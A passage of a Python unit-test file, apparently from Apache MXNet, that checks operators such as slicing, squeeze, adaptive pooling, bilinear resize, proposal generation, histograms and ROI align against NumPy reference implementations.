check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
with mx.np_shape():
var1 = mx.sym.var(name="data", shape=(-1, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (-1, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (-1, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (-1, 3))
var1 = mx.sym.var(name='data', shape=(10, -1))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, -1))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, -1))
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@mx.use_np_shape
def test_zero_size_min_max():
def min():
a = mx.nd.zeros(shape=(5, 0))
a.min()
def max():
a = mx.nd.zeros(shape=(5, 0))
a.max()
pytest.raises(MXNetError, min)
pytest.raises(MXNetError, max)
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
if out.shape == (1,): # as an exception (1, 1, 1) will be squeezed to (1,)
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
@pytest.mark.serial
def test_adaptive_avg_pool_op():
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
def adaptive_avg_pool_frame(x, y):
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
B,C,_,_ = x.shape
y = np.empty([B,C,height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
def test_bilinear_resize_op():
def py_bilinear_resize(x, outputHeight, outputWidth):
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
w1p = 1 if w1 < (inputWidth - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
def py_bilinear_resize_backward(x, incoming_grads, mode='size'):
data1 = np.zeros_like(x)
data2 = incoming_grads
batchsize = data1.shape[0]
channels = data1.shape[1]
height1 = data1.shape[2]
width1 = data1.shape[3]
height2 = data2.shape[2]
width2 = data2.shape[3]
rheight = float(height1 - 1) / (height2 - 1) if (height2 > 1) else 0
rwidth = float(width1 - 1) / (width2 - 1) if (width2 > 1) else 0
# special case: just copy
if height1 == height2 and width1 == width2:
data1 += data2
return [data1]
for h2 in range(0, height2):
for w2 in range(0, width2):
h1r = rheight * h2
h1 = int(h1r)
h1p = 1 if (h1 < height1 - 1) else 0
h1lambda = h1r - h1
h0lambda = 1 - h1lambda
#
w1r = rwidth * w2
w1 = int(w1r)
w1p = 1 if (w1 < width1 - 1) else 0
w1lambda = w1r - w1
w0lambda = 1 - w1lambda
#
for n in range(0, batchsize):
for c in range(0, channels):
d2val = data2[n][c][h2][w2]
data1[n][c][h1][w1] += h0lambda * w0lambda * d2val
data1[n][c][h1][w1 + w1p] += h0lambda * w1lambda * d2val
data1[n][c][h1 + h1p][w1] += h1lambda * w0lambda * d2val
data1[n][c][h1 + h1p][w1 + w1p] += h1lambda * w1lambda * d2val
if mode == 'like':
return data1, np.zeros_like(incoming_grads)
return [data1]
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y, py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
def check_bilinear_resize_align_corners_op():
img_shape = [1, 1, 3, 2]
data = [64, 32, 32, 64, 50, 100]
target_height = 6
target_width = 4
expected_data = {}
# align_corners = False
expected_data[0] = [
64.000, 56.000, 40.000, 32.000, 56.000, 52.000, 44.000, 40.000, 40.000, 44.000, 52.000, 56.000,
36.500, 45.625, 63.875, 73.000, 45.500, 56.875, 79.625, 91.000, 50.000, 62.500, 87.500, 100.000
]
# align_corners = True
expected_data[1] = [
64.000, 53.333, 42.667, 32.000, 51.200, 49.067, 46.933, 44.800, 38.400, 44.800, 51.200, 57.600,
35.600, 47.467, 59.333, 71.200, 42.800, 57.067, 71.333, 85.600, 50.000, 66.667, 83.333, 100.000
]
x = np.array(data, dtype=np.float32).reshape(img_shape)
x_nd = mx.nd.array(x)
y0 = np.array(expected_data[0]).reshape((1, 1, target_height, target_width))
y0_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=False)
assert_almost_equal(y0, y0_nd.asnumpy(), atol=1e-3)
y1 = np.array(expected_data[1]).reshape((1, 1, target_height, target_width))
y1_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=True)
assert_almost_equal(y1, y1_nd.asnumpy(), atol=1e-3)
def check_bilinear_resize_modes_op(shape, scale_height=None, scale_width=None, shape_1=None, mode=None):
x = mx.nd.random.uniform(shape=shape)
original_h = shape[2]
original_w = shape[3]
if mode == 'odd_scale':
assert scale_height is not None and scale_width is not None
new_h = int(original_h * scale_height) if (original_h % 2) == 0 else \
int((original_h - 1) * scale_height) + 1
new_w = int(original_w * scale_width) if (original_w % 2) == 0 \
else int((original_w - 1) * scale_width) + 1
y = mx.nd.contrib.BilinearResize2D(x, scale_height=scale_height,
scale_width=scale_width,
mode='odd_scale')
elif mode == 'to_even_down':
new_h = original_h if (original_h % 2) == 0 else original_h - 1
new_w = original_w if (original_w % 2) == 0 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_down')
elif mode == 'to_even_up':
new_h = original_h if (original_h % 2) == 0 else original_h + 1
new_w = original_w if (original_w % 2) == 0 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_up')
elif mode == 'to_odd_down':
new_h = original_h if (original_h % 2) == 1 else original_h - 1
new_w = original_w if (original_w % 2) == 1 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_down')
elif mode == 'to_odd_up':
new_h = original_h if (original_h % 2) == 1 else original_h + 1
new_w = original_w if (original_w % 2) == 1 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_up')
elif mode == 'like':
x_1 = mx.nd.random.uniform(shape=shape_1)
new_h = x_1.shape[2]
new_w = x_1.shape[3]
y = mx.nd.contrib.BilinearResize2D(x, x_1, mode='like')
new_shape_desired = np.array([shape[0], shape[1], new_h, new_w], dtype='int')
new_shape_got = np.array(y.shape, dtype='int')
data_sym = mx.sym.var('data')
data_np = x.asnumpy()
expected = py_bilinear_resize(data_np, new_h, new_w)
out_grads = np.ones([shape[0], shape[1], new_h, new_w])
expected_backward = py_bilinear_resize_backward(data_np, out_grads, mode)
assert_array_equal(new_shape_desired, new_shape_got, "Desired and got shapes are not equal. {} vs {}".format(
str(new_shape_desired.tolist()), str(new_shape_got.tolist())))
assert_almost_equal(y.asnumpy(), expected, 1e-3, 0)
if mode != 'like':
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, None, scale_height=scale_height, scale_width=scale_width, mode=mode)
check_symbolic_forward(resize_sym, [data_np], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np], rtol=1e-2, atol=1e-4)
else:
data_sym_like = mx.sym.var('data_like')
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, data_sym_like, mode=mode)
date_np_like = x_1.asnumpy()
check_symbolic_forward(resize_sym, [data_np, date_np_like], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np, date_np_like], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np, date_np_like], rtol=1e-2, atol=1e-4)
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
shape = (2, 2, 20, 20)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape = (2, 2, 21, 21)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape_0 = (2, 2, 21, 21)
shape_1 = (2, 2, 10, 10)
check_bilinear_resize_modes_op(shape_0, shape_1=shape_1, mode='like')
check_bilinear_resize_modes_op(shape_1, shape_1=shape_0, mode='like')
check_bilinear_resize_align_corners_op()
def test_multi_proposal_op():
# paramters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
single_proposal = []
single_score = []
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
expected = [np.zeros_like(e) for e in location]
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
tol = 1e-2 if dtype is np.float16 else 1e-5
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
backward_expected = 2 * a * data_np + b
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output, expected, rtol=tol, atol=tol)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected], rtol=tol, atol=tol)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
[backward_expected], rtol=tol, atol=tol)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
def allclose_function(contexts):
def getRandom(base, percent = 1.):
return base * (1 + percent * (2 * np.random.random_sample() - 1.) / 100)
title = 'exp'
for ctx in contexts:
title += ' cpu' if ctx == mx.cpu() else ' gpu'
title += ' nElem shape'
num_ctx = len(contexts)
result = [False, False]
for dtype in [np.float16, np.float32, np.float64]:
rtol = getRandom(1e-2 if dtype is np.float16 else 1e-5)
atol = getRandom(1e-4 if dtype is np.float16 else 1e-7)
print('\nnumpy.{}: atol = {} rtol = {}'.format(dtype.__name__, atol, rtol))
print(title)
for ndim in range(1, 10):
shape = rand_shape_nd(ndim, 8)
a_np = np.random.randn(*shape).astype(dtype)
b_np = (a_np + np.random.randn(*shape).astype(dtype) / 10000000).astype(dtype)
expected = np.allclose(a_np, b_np, rtol, atol)
for n, ctx in enumerate(contexts):
a_ctx = mx.nd.array(a_np, dtype = dtype, ctx=ctx)
b_ctx = mx.nd.array(b_np, dtype = dtype, ctx=ctx)
output = mx.nd.contrib.allclose(a_ctx, b_ctx, rtol=rtol, atol=atol)
result[n] = output.asnumpy() == 1
if expected != result[n]:
# Preparing the output of elements of the array, which are considered as "not close" AND
# corresponding elements of comparison CPU/GPU/Python vectors, which are considered as "close"
v_ctx = 'CPU' if ctx == mx.cpu() else 'GPU'
if expected:
v_cmp = 'Python'
a_b = a_ctx.asnumpy()
b_b = b_ctx.asnumpy()
a_g = np.asarray(a_np)
b_g = np.asarray(b_np)
else:
v_cmp = v_ctx
v_ctx = 'Python'
a_b = np.asarray(a_np)
b_b = np.asarray(b_np)
a_g = a_ctx.asnumpy()
b_g = b_ctx.asnumpy()
print('\n *** Violations found on %s, but not on %s side ***' % (v_ctx, v_cmp))
frmt = " a[{0:d}]: b[{0:d}]:" \
" abs(a[{0:d}]-b[{0:d}]) - atol + rtol*abs(b[{0:d}]):"
# Define the indices of all violations and corresponding values of coordinates
bad_indexes = np.abs(a_b - b_b) >= atol + rtol * abs(b_b)
a_values = [a_b[bad_indexes], a_g[bad_indexes]]
b_values = [b_b[bad_indexes], b_g[bad_indexes]]
idx = np.asarray(np.where(bad_indexes == True))
idx = idx.reshape(1, idx.size)
idx_flat = np.asarray(np.where(bad_indexes.flatten() == True)).flatten()
for i in range(len(a_values[0])):
flat_idx = idx_flat[i]
print('{}: index = {} flat_index = {}'.format('%4d'%i, idx[i], flat_idx))
print(frmt.format(flat_idx))
for j in range(2):
diff = np.abs(a_values[j][i]-b_values[j][i]) - atol + rtol*abs(b_values[j][i])
print('{}: {} {} {}'.format('%6s'%v_ctx, a_values[j][i], b_values[j][i], diff))
if num_ctx == 1:
print(' {0:d} {1:d} {2:10d} {3:}'.format(expected, result[0], np.prod(shape), shape))
else:
print(' {0:d} {1:d} {2:d} {3:10d} {4:}'.format(expected, result[0], result[1], np.prod(shape), shape))
if expected != result[0] or num_ctx > 1 and expected != result[1]:
assert False
@pytest.mark.serial
def test_allclose_function():
allclose_function([default_context()])
def test_histogram():
def f(x, bins=10, range=None):
return np.histogram(x, bins, range=range)
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1, np_bins1)
assert_almost_equal(mx_histo1, np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2, np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2, np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1._bind(ctx=default_context(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2._bind(ctx=default_context(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/13915")
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@pytest.mark.serial
def test_ravel():
# be aware that check_symbolic_forward will use float type internally
# for the arrays and that limits the representable flat index range.
# Taking dim==4 and a range of [0,..,100] for the data can already
# cause precision issues and break this test.
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
shape2 = shape
shape2 = (-1,)+shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
def test_unravel_index():
unravel_shape = (2, 10)
unravel_size = np.prod(unravel_shape)
for shape in [(10,), (2, 10), (3, 4, 5)]:
a = np.random.randint(0, unravel_size, size=shape)
b = np.stack(np.unravel_index(a, shape=unravel_shape), 0)
a_mx = mx.nd.array(a)
b_mx = mx.nd.unravel_index(a_mx, shape=unravel_shape)
assert_array_equal(b, b_mx.asnumpy())
def test_context_num_gpus():
try:
# Note: the test is run both on GPU and CPU hosts, so that we can not assert
# on a specific number here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
# Note: On a CPU only host CUDA sometimes is not able to determine the number
# of GPUs
if str(e).find("CUDA") == -1:
raise e
@pytest.mark.serial
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
C_out = C // PH // PW if position_sensitive else C
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_context()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
